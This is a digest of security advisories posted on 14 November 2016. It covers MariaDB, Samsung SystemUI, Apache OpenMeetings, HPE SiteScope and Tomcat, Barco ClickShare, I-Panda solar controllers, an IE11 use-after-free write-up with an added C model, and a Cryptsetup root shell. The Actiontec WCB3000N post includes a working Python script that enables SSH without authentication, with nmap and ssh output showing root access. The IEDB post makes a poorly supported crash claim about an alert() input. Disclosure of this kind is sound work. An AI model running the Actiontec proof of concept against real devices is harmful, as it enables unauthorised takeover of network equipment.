[SECURITY] [DSA 3711-1] mariadb-10.0 security update

2016-11-14 Thread Salvatore Bonaccorso

- -
Debian Security Advisory DSA-3711-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
November 11, 2016 https://www.debian.org/security/faq
- -

Package: mariadb-10.0
CVE ID : CVE-2016-3492 CVE-2016-5584 CVE-2016-5616 CVE-2016-5624
 CVE-2016-5626 CVE-2016-5629 CVE-2016-6663 CVE-2016-7440
 CVE-2016-8283

Several issues have been discovered in the MariaDB database server. The
vulnerabilities are addressed by upgrading MariaDB to the new upstream
version 10.0.28. Please see the MariaDB 10.0 Release Notes for further
details:

 https://mariadb.com/kb/en/mariadb/mariadb-10028-release-notes/

For the stable distribution (jessie), these problems have been fixed in
version 10.0.28-0+deb8u1.

For the testing distribution (stretch), these problems have been fixed
in version 10.0.28-1.

For the unstable distribution (sid), these problems have been fixed in
version 10.0.28-1.

We recommend that you upgrade your mariadb-10.0 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



CVE-2016-9277: A IDX Out of Bound vulnerability in systemui can make crash and ui restart

2016-11-14 Thread unlimitsec
Description of the potential vulnerability:
Severity: Low
Affected versions: L(5.0/5.1), M(6.0)
Disclosure status: Privately disclosed.
One of the activities in SystemUI can produce an array index out of bounds
exception through a combination of some APIs, which leads to a UI restart.
The patch fixes the vulnerability in the corresponding APIs.

Fix:
http://security.samsungmobile.com/smrupdate.html#SMR-NOV-2016
SVE-2016-6906: A IDX Out of Bound vulnerability in systemui can make crash and 
ui restart

Sincerely,

Alipay unLimit Security Team 


WHM Panel Mail Delivery Reports crash database Vulnerability

2016-11-14 Thread iedb . team
Mail Delivery Reports database crash in WHM panel version 60.0 (build 17),
local exploit
Pic:http://kkli.ir/C6LGY

#

# Iranian Exploit DataBase And Security Team - iedb.ir

# Title : WHM Panel Mail Delivery Reports crash database Vulnerability

# Vulnerability : Crash sendmail Database in whm panel

# Version : WHM 60.0 (build 17) 

# Local Vulnerability

# Method(s): POST

# pic : http://kkli.ir/C6LGY

# Author : IeDb.Ir

# Home : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir

# Vulnerability attack information site and insert site sqli and xss bug : 
http://xssed.Ir

# iedb team Telegram : https://telegram.me/joinchat/BdNXvD3FrFLG8tVtIfTjaQ

# Email : iedb.t...@gmail.com

# Archive Exploit : http://iedb.ir/exploits-6209.html

#

# Description:

Hello friends.
The vulnerability is local in both panels and crashes the email database.


Log in to the panel.
In the Email section, open Mail Delivery Reports.
It can do a search on email.
In this search field you can put your own code.
For example, I put this code:
 alert ( 'Iedb.ir') 
As you can see in the image below, the email database has crashed.

http://kkli.ir/C6LGY


In this field you can enter other input that also causes the database crash.
This bug works for local and remote, as it is written.
This security problem exists in all versions of the WHM panel.
Other remote exploits for this panel are private.


Thanks to all friends

#

Tnks To : All Member In Iedb.ir And Iedb.ir/acc And Xssed.ir

#

# Archive Exploit = http://iedb.ir/exploits-6209.html

#


[CVE-2016-8736] Apache Openmeetings RMI Registry Java Deserialization RCE

2016-11-14 Thread Maxim Solodovnik
Severity: Moderate

Vendor: The Apache Software Foundation

Versions Affected: Apache OpenMeetings 3.1.0

Description: Apache OpenMeetings is vulnerable to remote code
execution via an RMI deserialization attack.

The issue was fixed in 3.1.2.
All users are recommended to upgrade to Apache OpenMeetings 3.1.3.

Credit: This issue was identified by Jacob Baines, Tenable Network Security


Apache OpenMeetings Team




CVE-2015-0040: Microsoft Internet Explorer 11 MSHTML CMapElement::Notify use-after-free details

2016-11-14 Thread Berend-Jan Wever
Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the
tenth entry in that series.

The below information is available in more detail on my blog at
http://blog.skylined.nl/20161114001.html.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

Microsoft Internet Explorer 11 MSHTML CMapElement::Notify use-after-free

(MS15-009, CVE-2015-0040)

Synopsis

A specially crafted web-page can cause MSIE 11 to interrupt the handling
of one `readystatechange` event with another. This interrupts a call to
one of the various `CElement::Notify` functions to make
another such call and at least one of these functions is non-reentrant.
This can have various repercussions, e.g. when an attacker triggers this
vulnerability using a `CMapElement` object, a reference to that object
can be stored in a linked list and the object itself can be freed. This
pointer can later be re-used to cause a classic use-after-free issue.


Known affected versions, attack vectors and mitigations
---
* Microsoft Internet Explorer 11
  An attacker would need to get a target user to open a specially
  crafted web-page. Disabling JavaScript should prevent an attacker from
  triggering the vulnerable code path.

Description
---
When a `DocumentFragment` containing an applet element is added to the
DOM, all elements receive a notification that they are removed from the
`CMarkup`. Next, they are added to the DOM and receive notification of
being added to another `CMarkup`. When the applet is added, a
`CObjectElement` is created and added to the `CMarkup`. This causes a
`readystatechange` event to fire, which interrupts the current code.
During this `readystatechange` event, the DOM may be modified, which
causes further notifications to fire. However, elements in the
`DocumentFragment` that come after the applet element have already
received a notification that they have been removed from one `CMarkup`,
but not that they have been added to the new one. Thus, these elements
may receive another notification of removal, followed by two
notifications of being added to a `CMarkup`.

AFAICT, this event-within-an-event itself is the root cause of the bug
and allows memory corruption in various ways. I discovered the issue
because the code in `CMapElement::Notify` is non-reentrant and does not
handle this sequence of events well. This code maintains a singly linked
list of map elements that have been added to the document. An object
should never be added to this list twice, as this will cause a loop in
the list (a map element pointing to itself as the next in
the list). However, the event-within-an-event can be used to first cause
two consecutive calls to remove the same element from this list followed
by two calls to add the same element to the list. This results in the
following sequence of events:

* The first call to remove the element will remove it from the list.
* The second call to remove the element will do nothing.
* The first call to add the element will add it to the list.
* The second call to add the element will try to add it to the list
  again, causing the list to contain a loop. This list is now corrupt.

At this point, an attacker can remove the `CMapElement`, causing the
code to try to remove it from the list and free it. However, because of
the loop in the list, the above code will not actually remove it from
the list. After this, the pointer in the list points to freed memory and
an attacker can force MSIE to reuse it.

Time-line
-
* *September 2014*: This vulnerability was found through fuzzing.
* *September 2014*: This vulnerability was submitted to ZDI.
* *September 2014*: This vulnerability was acquired by ZDI.
* *February 2015*: Microsoft addressed this issue in MS15-009.
* *November 2016*: Details of this issue are released.

Cheers,

SkyLined
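The list corruption the write-up describes, replayed in an added C example. This is a hypothetical model, not MSHTML code and not part of SkyLined's post: a singly linked list whose add pushes at the head with no membership check and whose remove unlinks the first match (the semantics the text attributes to CMapElement::Notify), driven through the remove/remove/add/add sequence, plus a checked add that refuses the duplicate. The names MapElem, list_add, list_remove, list_add_checked and replay_* are assumptions made for this example.

```c
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical model of the map-element list; not the MSHTML implementation. */
typedef struct MapElem {
    struct MapElem *next;
    int id;
} MapElem;

static MapElem *g_head = NULL;

/* Add without a membership check: adding the same node twice sets
 * node->next = node, a one-element loop. */
static void list_add(MapElem *e) {
    e->next = g_head;
    g_head = e;
}

/* Unlink the first occurrence of e. Returns 1 if a match was found. */
static int list_remove(MapElem *e) {
    MapElem **pp = &g_head;
    while (*pp != NULL) {
        if (*pp == e) {
            *pp = e->next;   /* if e->next == e this re-links e: no change */
            return 1;
        }
        pp = &(*pp)->next;
    }
    return 0;
}

/* Bounded walk so a looped list cannot hang the check. Returns 1 if e is
 * reachable from the head within max_steps nodes. */
static int list_contains(const MapElem *e, int max_steps) {
    const MapElem *p = g_head;
    for (int i = 0; i < max_steps && p != NULL; i++, p = p->next)
        if (p == e) return 1;
    return 0;
}

/* Hardened add: refuse a node that is already linked. Returns 0 on a duplicate. */
static int list_add_checked(MapElem *e) {
    if (list_contains(e, 1000)) return 0;
    list_add(e);
    return 1;
}

/* Advisory sequence with the unchecked add. Returns 1 when the final remove
 * reports success but the node is self-looped and still reachable from the
 * head: freeing it now leaves a dangling pointer in the list (the UAF). */
int replay_double_add(void) {
    static MapElem map = { NULL, 1 };
    g_head = NULL; map.next = NULL;
    list_add(&map);                     /* normal insertion */
    int r1 = list_remove(&map);         /* first removal unlinks it */
    int r2 = list_remove(&map);         /* second removal finds nothing */
    list_add(&map);                     /* first add: list = [map] */
    list_add(&map);                     /* second add: map->next == map */
    int looped = (map.next == &map);
    int r3 = list_remove(&map);         /* the removal before the free */
    int still_linked = list_contains(&map, 4);
    return r1 == 1 && r2 == 0 && looped && r3 == 1 && still_linked;
}

/* Same sequence with the checked add. Returns 1 when the duplicate add is
 * refused and the final remove really unlinks the node. */
int replay_with_checked_add(void) {
    static MapElem map = { NULL, 2 };
    g_head = NULL; map.next = NULL;
    list_add(&map);
    list_remove(&map);
    list_remove(&map);
    int a1 = list_add_checked(&map);    /* accepted */
    int a2 = list_add_checked(&map);    /* refused: already linked */
    int r3 = list_remove(&map);
    int still_linked = list_contains(&map, 4);
    return a1 == 1 && a2 == 0 && r3 == 1 && !still_linked;
}

int main(void) {
    printf("unchecked add leaves a looped, still-linked node: %d\n", replay_double_add());
    printf("checked add keeps the list consistent:            %d\n", replay_with_checked_add());
    return 0;
}
```

The model shows why the fix belongs in the list operations and not in the event dispatch alone: once add can be re-entered, any later remove that "succeeds" without actually unlinking is the point at which the freed object stays reachable.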




SEC Consult SA-20161114-0 :: Multiple vulnerabilities in I-Panda SolarEagle - Solar Controller Administration Software / MPPT Solar Controller SMART2

2016-11-14 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20161114-0 >
===
                 title: Multiple vulnerabilities
               product: I-Panda SolarEagle - Solar Controller Administration
                        Software / MPPT Solar Controller SMART2
    vulnerable version: SolarEagle V2.00 / MPPT Solar Controller SMART2
         fixed version: -
            CVE number: -
                impact: Medium
              homepage: http://www.solarcontroller-inverter.com/
                 found: 2016-09-03
                    by: T. Weber (Office Vienna)
                        SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"ShenZhen I-Panda Electronics Co. Ltd. is developing power supply devices
such as UPS, power adapter and power inverter and also equipment for solar
systems. This equipment produced by I-Panda comprises solar panels/
controllers/inverters and also solar generator systems."

Source: http://www.solarcontroller-inverter.com/about-us.html


Business recommendation:

SEC Consult recommends not to use this product until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.


Vulnerability overview/description:
---
1) Broken Local Admin Authentication in SolarEagle V2.00
Attackers who have access to the locally installed software are able to
bypass the administrative login and can control the MPPT Solar Controller.

2) Missing Server Side Authentication in MPPT Solar Controller SMART2
Attackers who have access to the local network can send their own commands
to the MPPT Solar Controller and are able to control the device this way.

3) Unencrypted Communication in MPPT Solar Controller SMART2
Eavesdropping the communication is possible since unencrypted TCP is used
for all packets which are transferred between the controller and SolarEagle.

4) Denial of Service in MPPT Solar Controller SMART2
Attackers are able to disrupt an active connection as long as they want.


Proof of concept:
-
The vendor was not responsive, hence there is no fix available. The proof of
concept has been removed from this advisory.


Vulnerable / tested versions:
-
SolarEagle V2.00 / MPPT Solar Controller SMART2


Vendor contact timeline:

2016-09-12: Contacting vendor through email, sending responsible disclosure
policy, defining release deadline (10th November), asking for
encryption keys
2016-09-13: Contacting vendor through email, sending responsible disclosure
policy, defining release deadline (10th November), asking for
encryption keys
2016-09-13: Vendor: (Instant-Messenger) No encryption available. Offer to
send the advisory unencrypted; No Answer
2016-10-29: Offer to send the advisory unencrypted; No Answer
2016-11-03: Offer to send the advisory unencrypted; No Answer
2016-11-14: SEC Consult releases security advisory


Solution:
-
There is no fix available from the vendor as they did not respond.


Workaround:
---
No workaround


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF 

Multiple vulnerabilities in Barco Clickshare

2016-11-14 Thread vincent.ruijter
CVE-2016-3149 - Remote Code Execution in Barco ClickShare CSC-1 and CSM-1
Affected versions: all versions prior to v01.09.03 (CSC-1) and v01.06.02 
(CSM-1).
A remote code execution vulnerability exists within the Barco ClickShare base 
unit software, that could lead to full compromise of the appliance.

CVE-2016-3150 - Cross-site Scripting in Barco ClickShare CSC-1, CSM-1 and 
CSE-200
Affected versions:  all versions prior to v01.09.03 (CSC-1), v01.06.02 (CSM-1) 
and v01.03.02 (CSE-200)
A Cross-Site Scripting vulnerability exists within Barco ClickShare's CSC-1 
base unit's wallpaper.php due to invalid input and output sanitisation. 

CVE-2016-3151 - Path Traversal in Barco ClickShare CSC-1, CSM-1 and CSE-200
Affected versions: all versions prior to v01.09.03 (CSC-1),  v01.06.02 (CSM-1) 
and v01.03.02 (CSE-200).
A Path Traversal vulnerability exists within Barco ClickShare's wallpaper 
parsing functionality, which leads to disclosure of the /etc/shadow file on the 
file system. 

CVE-2016-3152 - /etc/shadow file disclosure in the CSC-1 firmware update
Affected versions: all versions prior to v01.09.03 (CSC-1)
It is possible to download and extract the firmware image of the CSC-1 and 
obtain the root password.

The vendor has acknowledged and patched the aforementioned issues. It is 
recommended to download and apply the most recent firmware update for your 
appliance.

References:
http://www.barco.com/en/mybarco/mysupport/documentation/software/software-detail?nr=R33050020&rev=00100209
http://www.barco.com/en/mybarco/mysupport/productsupport/software/software-detail?nr=R33050037&rev=001001000113
https://www.barco.com/en/mybarco/mysupport/productsupport/software/software-detail?nr=R33050070&rev=00100108

--

Regards,

Vincent Ruijter
Ethical Hacker
Chief Information Security Office
KPN B.V.





[security bulletin] HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery

2016-11-14 Thread security-alert

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05324755
Version: 1

HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote
Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-11-04
Last Updated: 2016-11-04

Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary
Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified in HPE SiteScope. The
vulnerabilities could be exploited to allow local elevation of privilege and
exploited remotely to allow denial of service, arbitrary code execution,
cross-site request forgery.

References:

  - CVE-2014-0114 - Apache Struts, execution of arbitrary code
  - CVE-2016-0763 - Apache Tomcat, denial of service (DoS)
  - CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions 
  - CVE-2015-3253 - Apache Groovy, execution of arbitrary code 
  - CVE-2015-5652 - Python, elevation of privilege
  - CVE-2013-6429 - Spring Framework, cross-site request forgery
  - CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)
  - PSRT110264

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HP SiteScope Monitors Software Series 11.2x−11.32IP1

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2013-6429
  6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
  6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

CVE-2014-0050
  8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
  7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

CVE-2014-0107
  8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
  7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

CVE-2014-0114
  6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
  7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

CVE-2015-3253
  7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
  7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

CVE-2015-5652
  8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)

CVE-2016-0763
  6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
  6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has provided a resolution via an update to HPE SiteScope. Details on the
update and each vulnerability are in the KM articles below.

  **Note:** The resolution for each vulnerability listed is to upgrade to
SiteScope 11.32IP2 or an even more recent version of SiteScope if available.
The SiteScope update can be can found in the personal zone in "my updates" in
HPE Software Support Online: .


  * Apache Commons FileUpload: KM02550251 (CVE-2014-0050)
  * Apache Struts: KM02553983 (CVE-2014-0114)
  * Apache Tomcat: KM02553990 (CVE-2016-0763)
  * Apache XML Xalan: KM02553991 (CVE-2014-0107)
  * Apache Groovy: KM02553992 (CVE-2015-3253)
  * Python: KM02553997 (CVE-2015-5652)
  * Spring Framework: KM02553998 (CVE-2013-6429)


HISTORY
Version:1 (rev.1) - 4 November 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subsc

[security bulletin] HPSBUX03665 rev.2 - HP-UX Tomcat-based Servlet Engine, Remote Denial of Service (DoS) and URL Redirection

2016-11-14 Thread security-alert

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324759

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05324759
Version: 2

HPSBUX03665 rev.2 - HP-UX Tomcat-based Servlet Engine, Remote Denial of
Service (DoS) and URL Redirection

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-11-09
Last Updated: 2016-11-08

Potential Security Impact: Remote: Denial of Service (DoS), URL Redirection

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in the HP-UX
Tomcat-based Servlet Engine. These vulnerabilities could be exploited
remotely to create a Denial of Service (DoS) and URL Redirection.

References:

  - PSRT110272
  - CVE-2016-3092 - Remote denial of Service (DoS)
  - CVE-2016-5388 - Remote URL Redirection
  - PSRT110255

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HP-UX Tomcat-based Servlet v.7.x Engine B.11.31 - Tomcat 7 prior to
D.7.0.70.01

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-3092
  7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)

CVE-2016-5388
  8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
  5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has provided the following software update to resolve the vulnerabilities
in HP-UX Apache Tomcat 7 Servlet Engine:

 * Tomcat 7.0.70.01 for HP-UX Release B.11.31 (IPF and PA-RISC)

+ 64 bit Depot: HP_UX_11.31_HPUXWS24ATW-B501-11-31-64.depot
+ 32 bit Depot: HP_UX_11.31_HPUXWS24ATW-B501-11-31-32.depot

* **Note:** The depot file can be found here:

+


**MANUAL ACTIONS: Yes - Update**

Download and install the software update

**PRODUCT SPECIFIC INFORMATION**

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HPE and lists recommended actions that may apply to a specific
HP-UX system. It can also download patches and create a depot automatically.
For more information see:
 
  *


The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.31 IA/PA
===  
hpuxws22TOMCAT.TOMCAT
hpuxws22TOMCAT.TOMCAT2
action: install revision D.7.0.70.01 or subsequent

END AFFECTED VERSIONS

HISTORY

Version:1 (rev.1) - 4 November 2016 Initial release

Version:2 (rev.2) - 8 November 2016 Removed extraneous text from background
section


Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notic

CVE-2016-4484: - Cryptsetup Initrd root Shell

2016-11-14 Thread Hector Marco
Hello All,


Affected package

Cryptsetup <= 2:1


CVE-ID
--
CVE-2016-4484


Description
---
A vulnerability exists in Cryptsetup, specifically in the scripts that
unlock the system partition when the partition is encrypted using LUKS
(Linux Unified Key Setup).

This vulnerability allows an attacker to obtain a root initramfs shell on
affected systems. The vulnerability is very reliable because it doesn't
depend on specific systems or configurations. Attackers can copy, modify or
destroy the hard disk as well as set up the network to exfiltrate data.

In cloud environments it is also possible to remotely exploit this
vulnerability without having "physical access."


Full description:
-
http://hmarco.org/bugs/CVE-2016-4484/CVE-2016-4484_cryptsetup_initrd_shell.html


Regards,
Hector Marco & Ismael Ripoll.





Actiontec WCB3000N (Telus Branded) Local Unauthenticated Privilege Elevation and Password Reset

2016-11-14 Thread Andrew Klaus
###  Device Details
Vendor: Actiontec (Telus Branded)
Model: WCB3000N
Affected Firmware: v0.16.2.5
Device Manual: 
http://static.telus.com/common/cms/files/internet/wifi_plus_extender.pdf
Reported: November 2015
Status: Fixed on newest pushed firmware version
CVE:  Update is handled by the vendor, therefore no CVE needed.

The Telus Actiontec WCB3000N is an access-point/bridge for MoCA,
Gigabit Ethernet, and both 802.11AGN 2.4GHz and 5GHz wireless
spectrums. It provides a web interface that allows control and
configuration of each of these technologies.

###   Summary of Findings
The Forgot Password webpage (http:///forgot_password.html)
asks for the device’s physical serial number before the admin password
can be reset. Any attacker on the same network as the device can pull
the device’s serial number from javascript without requiring physical
access to the device and can then reset the user password.
SSH can be enabled and used by an attacker without any authentication.
Files are stored, whether malicious or not, on the read-write
partition and remain untouched after factory resets.
Both of these attacks require the attacker to be on the same local
network as the access-point.


### Forgot Password Bypass
There is a javascript function on the "forgot password page" called
getDeviceSerialNum(). It calls the “gotserialnum.cgi” executable and
places the device’s serial number in the device_serial_num variable on
each page load. This serial number variable can be viewed through the
browser's developer console by reading the device_serial_num variable.
Once the serial number is known, the password can be reset. The
attacker needs to be on the same network as the WCB3000N device.



### Enabling SSH and accessing root console
In the html on the Advanced Setup page, there are some references to a
few pages that aren’t displayed by the browser by default. By design,
when accessing the /adv_localssh.html page we get automatically
redirected to the /adv_manage.html page, as seen in the javascript
code. However, if we block the javascript from carrying through the
redirect, we can see this page. Following the javascript and html
form, the /advlocalssh.cgi executable is POSTed with form data without
any authentication.

The proof of concept code in python is here:

import requests

# Device address; the same host is used in the nmap and ssh commands below.
TARGET = "192.168.1.10"

# Form fields submitted by /adv_localssh.html. The CGI accepts them without
# any authentication and enables the SSH service with the given credentials.
ssh_data = {"command": "apply",
            "mypage": "adv_localssh.html",
            "advanced_ssh_enable": "1",
            "advanced_ssh_username": "admin",
            "advanced_ssh_password": "admin",
            "advanced_ssh_port": "22",
            "advanced_ssh_timeout": "",
            "sel_ssh_timeout": "1800",
            "custom_ssh_timeout": ""}

s = requests.session()
r = s.post("http://%s/advlocalssh.cgi" % TARGET, data=ssh_data, timeout=10)
print(r.status_code)

## Before
[~]$ nmap -p ssh 192.168.1.10
PORT   STATESERVICE
22/tcp filtered ssh

[~]$ python2 wcb.py

## After
[~]$ nmap -p ssh 192.168.1.10
PORT   STATE SERVICE
22/tcp open  ssh

[~]$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@192.168.1.10
admin@192.168.1.10's password:
RLX Linux version 2.0
 _   _  _
| | | ||_|
   _  _ | | _  _| | _   _   _  _  _
  | |/ || |\ \/ /   | || |  _ \| | | |\ \/ /
  | |_/ | |/\   | || | | | | |_| |/\
  |_|   |_|\_/\_/   |_||_|_| |_|\|\_/\_/

For further information check:
http://processor.realtek.com/
#


--

### Other Discoveries
After gaining root access, other discoveries were made. Noticing the
/mnt/rt_conf directory being mounted read-write (which I assume is for
saving the config file state), I placed a dummy file in the directory
and then factory reset the device. The SSH access reverted back to
being disabled, but logging back into the device showed that the dummy
file still existed in /mnt/rt_conf.

OpenSSL is a very dated version (2006), and has 51 CVE vulnerabilities
listed 
https://www.cvedetails.com/vulnerability-list/vendor_id-217/product_id-383/version_id-26306/Openssl-Openssl-0.9.8.html.
  This could pose a vulnerability when the device speaks
TR-069 and pulls firmware updates.

# openssl version -a
OpenSSL 0.9.8b 04 May 2006
built on: Fri May 31 13:10:19 CST 2013
platform: rsdk-linux
options:  bn(32,32) md2(int) rc4(ptr,int) des(idx,cisc,4,long)
idea(int) blowfish(idx)
compiler: rsdk-linux-gcc -fPIC -DOPENSSL_PIC -DOPENSSL_THREADS
-D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -DTERMIO -Os
-fomit-frame-pointer -Wall
OPENSSLDIR: "/usr/local/ssl"

It’s possible to both kill the TR-069 remote device management service
and rewrite the config to disable it. Once disabled, there’s no way that
the vendor would be able to communicate with the device to patch it.


### Plausible Uses
An attacker could keep malware stored and have it survive both reboots
and factory resets.

Since there’s a full terminal present on the device, including
utilities such as tcpdump and scp, it would be trivial to sniff
traffic and Man-in-the-Middle connections passing through the bridge.

DoSsing or bricking the device would likely 

Re: [oss-security] CVE-2016-4484: - Cryptsetup Initrd root Shell

2016-11-14 Thread Leo Famulari
On Mon, Nov 14, 2016 at 08:45:51PM +, Hector Marco wrote:
> Hello All,
> 
> Affected package
> 
> Cryptsetup <= 2:1

Hi,

Can you clarify which versions are affected?

The latest upstream version is 1.7.3:

https://gitlab.com/cryptsetup/cryptsetup/commits/master

What is the 2:1 version?

